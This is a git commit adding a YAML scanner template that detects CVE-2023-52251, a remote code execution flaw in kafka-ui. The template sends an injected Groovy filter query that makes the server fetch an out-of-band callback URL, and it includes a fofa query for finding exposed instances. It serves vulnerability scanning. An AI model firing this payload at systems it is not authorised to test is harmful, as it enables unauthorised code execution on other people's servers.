add CVE-2023-52251

patch-4
yhy0 2024-03-14 16:49:09 +08:00
parent 34edd4dfb1
commit 456ed4ec41
1 changed files with 63 additions and 0 deletions

View File

@ -0,0 +1,63 @@
id: CVE-2023-52251
info:
name: kafka-ui - RCE
author: yhy0
severity: critical
description: |
Remote Code Execution vulnerability provectus/kafka-ui.
remediation: |
Do not expose to the Internet
reference:
- https://github.com/BobTheShoplifter/CVE-2023-52251-POC
- https://github.com/provectus/kafka-ui
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
cvss-score: 8.8
cve-id: CVE-2023-52251
metadata:
max-request: 3
fofa-query: icon_hash="-1477045616"
verified: true
tags: cve,cve2023,rce,kafka,kafka-ui
http:
- method: GET
path:
- "{{BaseURL}}/api/clusters"
- "{{BaseURL}}/api/clusters/{{cluster}}/topics?showInternal=true&search=&orderBy=NAME&sortOrder=ASC"
- "{{BaseURL}}/api/clusters/{{cluster}}/topics/{{topic}}/messages?q=new%20URL%28%22http%3A%2F%2F{{interactsh-url}}%22%29.text&filterQueryType=GROOVY_SCRIPT&attempt=2&limit=100&page=0&seekDirection=FORWARD&keySerde=String&valueSerde=String&seekType=BEGINNING"
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'contains(header, "application/json")'
- 'contains(body, "status\":\"online")'
- 'status_code == 200'
condition: and
- type: dsl
dsl:
- 'contains(content_type, "application/json")'
- 'contains(body, "name")'
- "status_code == 200"
condition: and
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
extractors:
- type: json
name: cluster
json:
- .[0].name
internal: true
- type: json
name: topic
json:
- .topics[0].name
internal: true